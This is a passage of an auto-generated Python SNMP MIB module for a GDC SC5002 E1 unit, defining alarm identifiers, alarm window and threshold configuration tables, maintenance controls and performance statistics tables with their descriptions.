sc5002UnitFailure = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 5))
sc5002TimingLoss = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 6))
sc5002LossOfSignal = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 7))
sc5002LossOfFrame = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 8))
sc5002AlarmIndSignal = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 9))
sc5002FallbackTimingActive = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 10))
sc5002NearEndLnCodeViol = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 11))
sc5002NearEndErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 12))
sc5002NearEndBkdBlkErr = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 13))
sc5002NearEndSevErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 14))
sc5002NearEndUnavlSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 15))
sc5002FarEndErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 16))
sc5002FarEndBkdBlkErr = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 17))
sc5002FarEndSevErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 18))
sc5002FarEndUnavlSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 19))
sc5002NearEndAlarmCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2), )
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgTable.setDescription('This table contains entries that configure Near End Alarm reporting.')
sc5002NearEndAlarmCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndAlarmCfgIndex"), (0, "SC5002-MIB", "sc5002NearEndAlarmCfgIdentifier"))
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgEntry.setDescription('An entry in the Near End Alarm Configuration table.')
sc5002NearEndAlarmCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndAlarmCfgIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIdentifier.setDescription('format: iso.org.dod.internet.private.enterprises.gdc. dsx1.sc5002.sc5002Alarms.sc5002AlarmData.ALM example: 1.3.6.1.4.1.498.6.8.4.1.ALM where ALM = 1 for sc5002NoResponse alarm, 2 for sc5002DiagRxErr alarm, etc., as specified in the Alarm Definitions above.')
sc5002NearEndAlarmWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("win30sec", 1), ("win1min", 2), ("win15min", 3), ("win1hr", 4), ("win24hr", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002NearEndAlarmWindow.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmWindow.setDescription("The time period in which a specified number of events must occur, (specified by the alarm's threshold), before declaring an alarm condition. After reporting an Alarm condition and upon expiration of the window time period, the event count is reset to zero and another time period is begun. If the specified number of events is not exceeded within the next time period, an Alarm Cleared condition is reported.")
sc5002NearEndAlarmThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("thr1", 1), ("thr3", 2), ("thr10", 3), ("thr100", 4), ("thr1000", 5), ("thr10000", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002NearEndAlarmThreshold.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmThreshold.setDescription("The number of events which must be exceed, within the time period specified by the alarm's window, before declaring an alarm")
sc5002FarEndAlarmCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3), )
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgTable.setDescription('This table contains entries that configure Far End Alarm reporting.')
sc5002FarEndAlarmCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndAlarmCfgIndex"), (0, "SC5002-MIB", "sc5002FarEndAlarmCfgIdentifier"))
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgEntry.setDescription('An entry in the Far End Alarm Configuration table.')
sc5002FarEndAlarmCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndAlarmCfgIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIdentifier.setDescription('format: iso.org.dod.internet.private.enterprises.gdc. dsx1.sc5002.sc5002Alarms.sc5002AlarmData.ALM example: 1.3.6.1.4.1.498.6.8.4.1.ALM where ALM = 1 for sc5002NoResponse alarm, 2 for sc5002DiagRxErr alarm, etc., as specified in the Alarm Definitions above.')
sc5002FarEndAlarmWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("win30sec", 1), ("win1min", 2), ("win15min", 3), ("win1hr", 4), ("win24hr", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002FarEndAlarmWindow.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmWindow.setDescription("The time period in which a specified number of events must occur, (specified by the alarm's threshold), before declaring an alarm condition. After reporting an Alarm condition and upon expiration of the window time period, the event count is reset to zero and another time period is begun. If the specified number of events is not exceeded within the next time period, an Alarm Cleared condition is reported.")
sc5002FarEndAlarmThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("thr1", 1), ("thr3", 2), ("thr10", 3), ("thr100", 4), ("thr1000", 5), ("thr10000", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002FarEndAlarmThreshold.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmThreshold.setDescription("The number of events which must be exceed, within the time period specified by the alarm's window, before declaring an alarm")
sc5002MaintenanceTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1), )
if mibBuilder.loadTexts: sc5002MaintenanceTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MaintenanceTable.setDescription('The table describes the maintenance objects for the unit and references the unit interface (cc = 00).')
sc5002MaintenanceEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002MaintenanceLineIndex"))
if mibBuilder.loadTexts: sc5002MaintenanceEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MaintenanceEntry.setDescription('An entry in the GDC E1 Maintenance Table.')
sc5002MaintenanceLineIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002MaintenanceLineIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MaintenanceLineIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002SoftReset = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("reset", 1), ("norm", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002SoftReset.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002SoftReset.setDescription('Supports the action of soft resetting the unit. When this object is set to reset(1), then the unit performs a soft reset, whose meaning is specific to the type of unit being managed. The value of norm(2) will be returned when the reset is complete. The value of norm(2) can not be set by management.')
sc5002DefaultInit = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("factoryDefault", 1), ("normal", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002DefaultInit.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DefaultInit.setDescription('This is used to allow the NonVolatile Configuration to be set to a factory default state. When this value is set to factoryDefault(1) the unit will perform a reset to make the default configuration take effect. The value of normal(2) will be returned when the initialization is complete. The value of normal(2) can not be set by management.')
sc5002NearEndResetStats = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("norm", 1), ("reset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002NearEndResetStats.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndResetStats.setDescription('Supports the action of soft resetting the sc5002NearEndValidIntervals object. When this object is set to reset(2), then the unit will reset the sc5002ValidIntervals object to zero. The value of norm(1) can not be set by management.')
sc5002NearEndStatLastInitialized = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndStatLastInitialized.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndStatLastInitialized.setDescription('Number of seconds from midnight Dec 31, 1969 up until sc5002NearEndValidIntervals was last initialized to zero')
sc5002FarEndResetStats = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("norm", 1), ("reset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002FarEndResetStats.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndResetStats.setDescription('Supports the action of soft resetting the sc5002FarEndValidIntervals object. When this object is set to reset(2), then the unit will reset the sc5002ValidIntervals object to zero. The value of norm(1) can not be set by management.')
sc5002FarEndStatLastInitialized = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndStatLastInitialized.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndStatLastInitialized.setDescription('Number of seconds from midnight Dec 31, 1969 up until sc5002FarEndValidIntervals was last initialized to zero')
sc5002LedStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 8), OctetString().subtype(subtypeSpec=ValueSizeConstraint(3, 3)).setFixedLength(3)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002LedStatus.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002LedStatus.setDescription('Returns a bitwise snapshot of the front panel LED state. Octet 1 bit 7 - not used bit 6 - ON bit 5 - INSV bit 4 - RSP bit 3 - TMG bit 2 - NIU bit 1 - D_I bit 0 - future use Octet 2 bit 7 - not used bit 6 - future use bit 5 - NTWK AIS bit 4 - NTWK LCV bit 3 - NTWK LOS bit 2 - NTWK OOF bit 1 - ALM bit 0 - TM Octet 3 bit 7 - not used bit 6 - ST- future use bit 5 - LT- future use bit 4 - RL- future use bit 3 - TM transitions/flashing bit 2 - future use bit 1 - future use bit 0 - future use')
sc5002NearEndValidIntervals = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndValidIntervals.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndValidIntervals.setDescription('The number of previous intervals for which valid data was collected. The value will be 16 unless the interface was brought on-line within the last 4 hours, in which case the value will be the number of complete 15 minute intervals the since interface has been online.')
sc5002FarEndValidIntervals = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndValidIntervals.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndValidIntervals.setDescription('The number of previous intervals for which valid data was collected. The value will be 16 unless the interface was brought on-line within the last 4 hours, in which case the value will be the number of complete 15 minute intervals the since interface has been online.')
sc5002SysUpTime = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002SysUpTime.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002SysUpTime.setDescription('This variable is used to report the elapsed system tick time for conversion to real time at the controller and is not related to the sysUpTime referenced in MIB-II. Upon power-up of the unit, the elapsed time is cleared. The elapsed time counter rolls over upon reaching the maximum count.')
sc5002NearEndCurrent15MinTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1), )
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinTable.setDescription('The sc5002 Current table.')
sc5002NearEndCurrent15MinEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndCurrent15MinIndex"))
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinEntry.setDescription('An entry in the sc5002 NearEnd Current table.')
sc5002NearEndCurrent15MinIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndCurrent15MinStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinStat.setDescription('Returns a bitwise snapshot of the current 15Min statistics. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 -- 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 Counter Overflow (>65535) LCV 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 LCV . 11.0 2^7 12.7 f/u 12.6 2^6 LCV . 12.0 2^0 ')
sc5002NearEndIntervalTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2), )
if mibBuilder.loadTexts: sc5002NearEndIntervalTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalTable.setDescription('The sc5002 Interval table.')
sc5002NearEndIntervalEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndIntervalIndex"), (0, "SC5002-MIB", "sc5002NearEndIntervalNumber"))
if mibBuilder.loadTexts: sc5002NearEndIntervalEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalEntry.setDescription('An entry in the E1 Interval table.')
sc5002NearEndIntervalIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndIntervalIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndIntervalNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndIntervalNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalNumber.setDescription('The number of Errored Seconds encountered by an E1 interface in one of the previous 16, individual 15 minute, intervals.')
sc5002NearEndIntervalStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndIntervalStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalStat.setDescription('Returns a bitwise map of the interface in one of the previous 16, individual 15 minute, intervals. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 -- 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 Counter Overflow (>65535) LCV 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 LCV . 11.0 2^7 12.7 f/u 12.6 2^6 LCV . 12.0 2^0 ')
sc5002NearEndCurrent24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3), )
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrTable.setDescription('The E1 Current24Hr table. 4 hour interval.')
sc5002NearEndCurrent24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndCurrent24HrIndex"))
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrEntry.setDescription('An entry in the E1 Total table.')
sc5002NearEndCurrent24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndCurrent24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(15, 15)).setFixedLength(15)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrStat.setDescription('Returns a bitwise map of the current 24 hour table 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 -- 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 13.7 f/u 13.6 f/u 13.5 f/u 13.4 f/u 13.3 f/u 13.2 1: Counter Overflow (>65535) LCV 13.1 2^15 13.0 2^14 14.7 f/u 14.6 2^13 LCV . 14.0 2^7 15.7 f/u 15.6 2^6 LCV . 15.0 2^0 ')
sc5002NearEndRecent24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4), )
if mibBuilder.loadTexts: sc5002NearEndRecent24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrTable.setDescription('The E1 Recent24Hr table. 4 hour interval.')
sc5002NearEndRecent24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndRecent24HrIndex"))
if mibBuilder.loadTexts: sc5002NearEndRecent24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrEntry.setDescription('An entry in the E1 Total table.')
sc5002NearEndRecent24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndRecent24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndRecent24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(15, 15)).setFixedLength(15)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndRecent24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrStat.setDescription('Returns a bitwise map of the current 24 hour table 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 -- 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 13.7 f/u 13.6 f/u 13.5 f/u 13.4 f/u 13.3 f/u 13.2 1: Counter Overflow (>65535) LCV 13.1 2^15 13.0 2^14 14.7 f/u 14.6 2^13 LCV . 14.0 2^7 15.7 f/u 15.6 2^6 LCV . 15.0 2^0 ')
sc5002FarEndCurrent15MinTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5), )
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinTable.setDescription('The sc5002FarEnd Current 15 minute table.')
sc5002FarEndCurrent15MinEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndCurrent15MinIndex"))
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinEntry.setDescription('An entry in the sc5002FarEnd Current 15 Minute table.')
sc5002FarEndCurrent15MinIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndCurrent15MinStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(9, 9)).setFixedLength(9)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinStat.setStatus('mandatory')
